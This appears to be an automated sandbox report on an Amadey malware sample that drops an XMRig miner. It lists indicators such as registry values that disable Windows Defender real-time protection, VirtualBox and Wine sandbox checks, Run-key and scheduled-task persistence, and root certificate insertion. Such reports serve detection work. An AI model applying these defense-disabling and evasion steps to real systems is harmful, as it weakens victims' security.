amadey | 52255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	j21Hq7C.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	j21Hq7C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	j21Hq7C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	j21Hq7C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	j21Hq7C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	j21Hq7C.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	j21Hq7C.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	s7MG2VL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/312-261-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-267-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-265-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-263-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-259-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-257-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-255-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig
behavioral1/memory/312-253-0x0000000140000000-0x00000001408C3000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3028	powershell.exe
42	2608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2020	powershell.exe
2804	powershell.exe
1736	powershell.exe
1872	powershell.exe
2580	powershell.exe
2448	powershell.exe
2764	powershell.exe
3256	powershell.exe
3728	powershell.exe
3028	powershell.exe
2212	powershell.exe
2608	powershell.exe
2840	powershell.exe
584	powershell.exe
2376	powershell.exe
2156	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
28	684	rapes.exe
31	2588	j21Hq7C.exe
4	3028	powershell.exe
17	684	rapes.exe
38	2212	powershell.exe
42	2608	powershell.exe
7	684	rapes.exe
7	684	rapes.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	s7MG2VL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	s7MG2VL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Executes dropped EXE 18 IoCs

pid	Process
2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
684	rapes.exe
2520	s7MG2VL.exe
2668	ZqkKpwG.exe
1368	ZqkKpwG.exe
1048	ZqkKpwG.exe
932	9JFiKVm.exe
2616	packed.exe
2856	0000028173.exe
576	Esu6YYl.exe
2288	Esu6YYl.exe
992	O9s3coZ.exe
2696	Esu6YYl.exe
312	Esu6YYl.exe
2588	j21Hq7C.exe
2532	0e0ddeb673.exe
2700	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
1752	dBKUxeI.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	s7MG2VL.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rapes.exe

Loads dropped DLL 31 IoCs

pid	Process
3028	powershell.exe
2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
684	rapes.exe
684	rapes.exe
684	rapes.exe
684	rapes.exe
2668	ZqkKpwG.exe
2668	ZqkKpwG.exe
684	rapes.exe
1248	WerFault.exe
1248	WerFault.exe
1248	WerFault.exe
1248	WerFault.exe
684	rapes.exe
2616	packed.exe
2616	packed.exe
684	rapes.exe
1044	cmd.exe
684	rapes.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1092	Process not Found
1760	Process not Found
684	rapes.exe
684	rapes.exe
684	rapes.exe
2212	powershell.exe
684	rapes.exe
684	rapes.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\0e0ddeb673.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222760101\\0e0ddeb673.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222770121\\am_no.cmd"	rapes.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1644	powercfg.exe
2628	powercfg.exe
2788	powercfg.exe
2352	powercfg.exe
2064	powercfg.exe
3052	powercfg.exe
2144	powercfg.exe
2880	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0004000000005b27-305.dat	autoit_exe
behavioral1/files/0x000500000001a4b9-1160.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
684	rapes.exe
2520	s7MG2VL.exe
2700	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2668 set thread context of 1048	2668	ZqkKpwG.exe	43
PID 2288 set thread context of 2696	2288	Esu6YYl.exe	65
PID 2288 set thread context of 312	2288	Esu6YYl.exe	67

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019ae1-280.dat	upx
behavioral1/memory/2588-292-0x000000013F7C0000-0x000000013F812000-memory.dmp	upx
behavioral1/memory/2588-329-0x000000013F7C0000-0x000000013F812000-memory.dmp	upx
behavioral1/memory/2588-817-0x000000013F7C0000-0x000000013F812000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000028173.exe	packed.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1976	sc.exe
3068	sc.exe
2924	sc.exe
292	sc.exe
2408	sc.exe
1608	sc.exe
956	sc.exe
2264	sc.exe
540	sc.exe
1716	sc.exe
1420	sc.exe
916	sc.exe
868	sc.exe
1592	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0e0ddeb673.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s7MG2VL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZqkKpwG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b90944a141.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZqkKpwG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2332	PING.EXE
1044	cmd.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
1044	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	packed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	j21Hq7C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	j21Hq7C.exe

Kills process with taskkill 5 IoCs

pid	Process
2032	taskkill.exe
1592	taskkill.exe
2244	taskkill.exe
596	taskkill.exe
3032	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 6 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ZqkKpwG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	rapes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	ZqkKpwG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ZqkKpwG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ZqkKpwG.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2332	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3032	schtasks.exe
2484	schtasks.exe
2532	schtasks.exe
2996	schtasks.exe
2168	schtasks.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3028	powershell.exe
3028	powershell.exe
3028	powershell.exe
2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
684	rapes.exe
2520	s7MG2VL.exe
584	powershell.exe
2804	powershell.exe
2212	powershell.exe
2212	powershell.exe
2212	powershell.exe
2700	TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
1736	powershell.exe
1872	powershell.exe
2020	powershell.exe
2608	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeLockMemoryPrivilege	312	Esu6YYl.exe
Token: SeLockMemoryPrivilege	312	Esu6YYl.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
1280	b90944a141.exe
1280	b90944a141.exe
1280	b90944a141.exe
2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
312	Esu6YYl.exe
2532	0e0ddeb673.exe
2532	0e0ddeb673.exe
2532	0e0ddeb673.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1280	b90944a141.exe
1280	b90944a141.exe
1280	b90944a141.exe
2532	0e0ddeb673.exe
2532	0e0ddeb673.exe
2532	0e0ddeb673.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
